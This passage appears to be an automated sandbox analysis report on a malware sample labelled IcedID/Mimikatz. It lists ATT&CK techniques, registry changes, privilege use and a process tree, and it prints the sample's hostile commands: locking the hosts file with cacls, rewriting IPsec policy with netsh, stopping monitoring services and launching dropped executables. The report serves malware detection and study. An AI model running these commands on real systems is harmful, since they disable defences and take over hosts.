Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

PING.EXEcacls.exenetsh.exenet.exenet.execmd.execmd.execacls.exebiebucb.execmd.execmd.execmd.exenetsh.exesc.exenspfoo.exenet1.execacls.execmd.exenet1.exenet.exenetsh.execmd.exesc.exesc.exeiiqtmdpdb.exe2024-10-17_35f222d92a10a73cb88b11e638dc246b_hacktools_icedid_mimikatz.execacls.exenet.execmd.exenet1.exexohudmc.execmd.execmd.exenetsh.exenet1.execmd.exenetsh.execmd.execmd.exenetsh.exenet.exenetsh.execmd.exenetsh.execmd.exenet.exenet.execmd.execmd.exenetsh.exenetsh.execmd.execmd.exewpcap.exenet1.exenet.exenet1.execmd.exenetsh.exebiebucb.exeschtasks.exenet1.exenetsh.execmd.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	biebucb.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nspfoo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	iiqtmdpdb.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2024-10-17_35f222d92a10a73cb88b11e638dc246b_hacktools_icedid_mimikatz.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xohudmc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wpcap.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	biebucb.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

Processes:

cmd.exePING.EXE

pid	Process
2532	cmd.exe
2416	PING.EXE

NSIS installer 3 IoCs

installer

Processes:

resource	yara_rule
behavioral2/files/0x0007000000023c88-6.dat	nsis_installer_2
behavioral2/files/0x0007000000023ca0-15.dat	nsis_installer_1
behavioral2/files/0x0007000000023ca0-15.dat	nsis_installer_2

Modifies data under HKEY_USERS 45 IoCs

Processes:

biebucb.exectkyggczb.exectkyggczb.exectkyggczb.exectkyggczb.exectkyggczb.exectkyggczb.exectkyggczb.exectkyggczb.exectkyggczb.exectkyggczb.exectkyggczb.exectkyggczb.exectkyggczb.exectkyggczb.exectkyggczb.exectkyggczb.exectkyggczb.exectkyggczb.exe

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	biebucb.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	biebucb.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	biebucb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ctkyggczb.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ctkyggczb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	ctkyggczb.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ctkyggczb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ctkyggczb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals	ctkyggczb.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ctkyggczb.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ctkyggczb.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ctkyggczb.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ctkyggczb.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ctkyggczb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ctkyggczb.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ctkyggczb.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ctkyggczb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ctkyggczb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ctkyggczb.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ctkyggczb.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ctkyggczb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ctkyggczb.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ctkyggczb.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ctkyggczb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ctkyggczb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ctkyggczb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ctkyggczb.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ctkyggczb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ctkyggczb.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ctkyggczb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ctkyggczb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ctkyggczb.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	biebucb.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	biebucb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ctkyggczb.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ctkyggczb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ctkyggczb.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ctkyggczb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	biebucb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	ctkyggczb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ctkyggczb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ctkyggczb.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	ctkyggczb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ctkyggczb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	ctkyggczb.exe

Modifies registry class 14 IoCs

Processes:

biebucb.exe

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\	biebucb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\	biebucb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile"	biebucb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile"	biebucb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\	biebucb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\	biebucb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\	biebucb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile"	biebucb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile"	biebucb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\	biebucb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile"	biebucb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile"	biebucb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\	biebucb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile"	biebucb.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

Processes:

PING.EXE

pid	Process
2416	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid	Process
4392	schtasks.exe
4332	schtasks.exe
2620	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

biebucb.exe

pid	Process
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe

Suspicious behavior: LoadsDriver 15 IoCs

Processes:

pid	Process
668
668
668
668
668
668
668
668
668
668
668
668
668
668
668

Suspicious behavior: RenamesItself 1 IoCs

Processes:

2024-10-17_35f222d92a10a73cb88b11e638dc246b_hacktools_icedid_mimikatz.exe

pid	Process
3720	2024-10-17_35f222d92a10a73cb88b11e638dc246b_hacktools_icedid_mimikatz.exe

Suspicious use of AdjustPrivilegeToken 24 IoCs

Processes:

2024-10-17_35f222d92a10a73cb88b11e638dc246b_hacktools_icedid_mimikatz.exebiebucb.exebiebucb.exevfshost.exectkyggczb.exeiljmvq.exectkyggczb.exectkyggczb.exectkyggczb.exectkyggczb.exectkyggczb.exectkyggczb.exectkyggczb.exectkyggczb.exectkyggczb.exectkyggczb.exectkyggczb.exectkyggczb.exectkyggczb.exectkyggczb.exectkyggczb.exectkyggczb.exectkyggczb.exe

description	pid	Process
Token: SeDebugPrivilege	3720	2024-10-17_35f222d92a10a73cb88b11e638dc246b_hacktools_icedid_mimikatz.exe
Token: SeDebugPrivilege	2400	biebucb.exe
Token: SeDebugPrivilege	4744	biebucb.exe
Token: SeDebugPrivilege	4312	vfshost.exe
Token: SeDebugPrivilege	2336	ctkyggczb.exe
Token: SeLockMemoryPrivilege	5040	iljmvq.exe
Token: SeLockMemoryPrivilege	5040	iljmvq.exe
Token: SeDebugPrivilege	4460	ctkyggczb.exe
Token: SeDebugPrivilege	2176	ctkyggczb.exe
Token: SeDebugPrivilege	1920	ctkyggczb.exe
Token: SeDebugPrivilege	3172	ctkyggczb.exe
Token: SeDebugPrivilege	3452	ctkyggczb.exe
Token: SeDebugPrivilege	4900	ctkyggczb.exe
Token: SeDebugPrivilege	1516	ctkyggczb.exe
Token: SeDebugPrivilege	3820	ctkyggczb.exe
Token: SeDebugPrivilege	4212	ctkyggczb.exe
Token: SeDebugPrivilege	3120	ctkyggczb.exe
Token: SeDebugPrivilege	4460	ctkyggczb.exe
Token: SeDebugPrivilege	4956	ctkyggczb.exe
Token: SeDebugPrivilege	2324	ctkyggczb.exe
Token: SeDebugPrivilege	3832	ctkyggczb.exe
Token: SeDebugPrivilege	4916	ctkyggczb.exe
Token: SeDebugPrivilege	3064	ctkyggczb.exe
Token: SeDebugPrivilege	1608	ctkyggczb.exe

Suspicious use of SetWindowsHookEx 12 IoCs

Processes:

2024-10-17_35f222d92a10a73cb88b11e638dc246b_hacktools_icedid_mimikatz.exebiebucb.exebiebucb.exexohudmc.exenspfoo.exebiebucb.exebiebucb.exe

pid	Process
3720	2024-10-17_35f222d92a10a73cb88b11e638dc246b_hacktools_icedid_mimikatz.exe
3720	2024-10-17_35f222d92a10a73cb88b11e638dc246b_hacktools_icedid_mimikatz.exe
2400	biebucb.exe
2400	biebucb.exe
4744	biebucb.exe
4744	biebucb.exe
4188	xohudmc.exe
2860	nspfoo.exe
4920	biebucb.exe
4920	biebucb.exe
1572	biebucb.exe
1572	biebucb.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

2024-10-17_35f222d92a10a73cb88b11e638dc246b_hacktools_icedid_mimikatz.execmd.exebiebucb.execmd.execmd.exenet.exenet.exenet.exenet.execmd.exenet.exe

description	pid	Process	procid_target
PID 3720 wrote to memory of 2532	3720	2024-10-17_35f222d92a10a73cb88b11e638dc246b_hacktools_icedid_mimikatz.exe	86
PID 3720 wrote to memory of 2532	3720	2024-10-17_35f222d92a10a73cb88b11e638dc246b_hacktools_icedid_mimikatz.exe	86
PID 3720 wrote to memory of 2532	3720	2024-10-17_35f222d92a10a73cb88b11e638dc246b_hacktools_icedid_mimikatz.exe	86
PID 2532 wrote to memory of 2416	2532	cmd.exe	88
PID 2532 wrote to memory of 2416	2532	cmd.exe	88
PID 2532 wrote to memory of 2416	2532	cmd.exe	88
PID 2532 wrote to memory of 2400	2532	cmd.exe	90
PID 2532 wrote to memory of 2400	2532	cmd.exe	90
PID 2532 wrote to memory of 2400	2532	cmd.exe	90
PID 4744 wrote to memory of 4404	4744	biebucb.exe	92
PID 4744 wrote to memory of 4404	4744	biebucb.exe	92
PID 4744 wrote to memory of 4404	4744	biebucb.exe	92
PID 4404 wrote to memory of 244	4404	cmd.exe	94
PID 4404 wrote to memory of 244	4404	cmd.exe	94
PID 4404 wrote to memory of 244	4404	cmd.exe	94
PID 4404 wrote to memory of 4900	4404	cmd.exe	95
PID 4404 wrote to memory of 4900	4404	cmd.exe	95
PID 4404 wrote to memory of 4900	4404	cmd.exe	95
PID 4404 wrote to memory of 892	4404	cmd.exe	96
PID 4404 wrote to memory of 892	4404	cmd.exe	96
PID 4404 wrote to memory of 892	4404	cmd.exe	96
PID 4404 wrote to memory of 2908	4404	cmd.exe	97
PID 4404 wrote to memory of 2908	4404	cmd.exe	97
PID 4404 wrote to memory of 2908	4404	cmd.exe	97
PID 4404 wrote to memory of 5100	4404	cmd.exe	98
PID 4404 wrote to memory of 5100	4404	cmd.exe	98
PID 4404 wrote to memory of 5100	4404	cmd.exe	98
PID 4404 wrote to memory of 1272	4404	cmd.exe	99
PID 4404 wrote to memory of 1272	4404	cmd.exe	99
PID 4404 wrote to memory of 1272	4404	cmd.exe	99
PID 4744 wrote to memory of 3616	4744	biebucb.exe	100
PID 4744 wrote to memory of 3616	4744	biebucb.exe	100
PID 4744 wrote to memory of 3616	4744	biebucb.exe	100
PID 4744 wrote to memory of 3740	4744	biebucb.exe	102
PID 4744 wrote to memory of 3740	4744	biebucb.exe	102
PID 4744 wrote to memory of 3740	4744	biebucb.exe	102
PID 4744 wrote to memory of 4880	4744	biebucb.exe	104
PID 4744 wrote to memory of 4880	4744	biebucb.exe	104
PID 4744 wrote to memory of 4880	4744	biebucb.exe	104
PID 4744 wrote to memory of 2912	4744	biebucb.exe	119
PID 4744 wrote to memory of 2912	4744	biebucb.exe	119
PID 4744 wrote to memory of 2912	4744	biebucb.exe	119
PID 2912 wrote to memory of 3932	2912	cmd.exe	121
PID 2912 wrote to memory of 3932	2912	cmd.exe	121
PID 2912 wrote to memory of 3932	2912	cmd.exe	121
PID 2964 wrote to memory of 1648	2964	net.exe	124
PID 2964 wrote to memory of 1648	2964	net.exe	124
PID 2964 wrote to memory of 1648	2964	net.exe	124
PID 2868 wrote to memory of 1436	2868	net.exe	127
PID 2868 wrote to memory of 1436	2868	net.exe	127
PID 2868 wrote to memory of 1436	2868	net.exe	127
PID 2468 wrote to memory of 2508	2468	net.exe	130
PID 2468 wrote to memory of 2508	2468	net.exe	130
PID 2468 wrote to memory of 2508	2468	net.exe	130
PID 4840 wrote to memory of 2312	4840	net.exe	133
PID 4840 wrote to memory of 2312	4840	net.exe	133
PID 4840 wrote to memory of 2312	4840	net.exe	133
PID 4744 wrote to memory of 244	4744	biebucb.exe	134
PID 4744 wrote to memory of 244	4744	biebucb.exe	134
PID 4744 wrote to memory of 244	4744	biebucb.exe	134
PID 244 wrote to memory of 1332	244	cmd.exe	136
PID 244 wrote to memory of 1332	244	cmd.exe	136
PID 244 wrote to memory of 1332	244	cmd.exe	136
PID 1332 wrote to memory of 5076	1332	net.exe	137

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2096
- C:\Windows\TEMP\bzlikjnbm\iljmvq.exe
  "C:\Windows\TEMP\bzlikjnbm\iljmvq.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:5040

C:\Users\Admin\AppData\Local\Temp\2024-10-17_35f222d92a10a73cb88b11e638dc246b_hacktools_icedid_mimikatz.exe
"C:\Users\Admin\AppData\Local\Temp\2024-10-17_35f222d92a10a73cb88b11e638dc246b_hacktools_icedid_mimikatz.exe"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3720
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\ivwjddbm\biebucb.exe
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:2532
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1 -n 5
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:2416
- - C:\Windows\ivwjddbm\biebucb.exe
    C:\Windows\ivwjddbm\biebucb.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:2400

C:\Windows\ivwjddbm\biebucb.exe
C:\Windows\ivwjddbm\biebucb.exe
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4744
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4404
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:244
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4900
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:892
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2908
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:5100
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1272
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static del all
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:3616
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add policy name=Bastards description=FuckingBastards
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:3740
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filteraction name=BastardsList action=block
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4880
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\yvccbdwlz\cttnbjmli\wpcap.exe /S
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2912
- - C:\Windows\yvccbdwlz\cttnbjmli\wpcap.exe
    C:\Windows\yvccbdwlz\cttnbjmli\wpcap.exe /S
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3932
  - - C:\Windows\SysWOW64\net.exe
      net stop "Boundary Meter"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2964
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Boundary Meter"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1648
  - - C:\Windows\SysWOW64\net.exe
      net stop "TrueSight Meter"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2868
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "TrueSight Meter"
        5⤵
        
        PID:1436
  - - C:\Windows\SysWOW64\net.exe
      net stop npf
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2468
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop npf
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2508
  - - C:\Windows\SysWOW64\net.exe
      net start npf
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4840
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start npf
        5⤵
        
        PID:2312
- C:\Windows\SysWOW64\cmd.exe
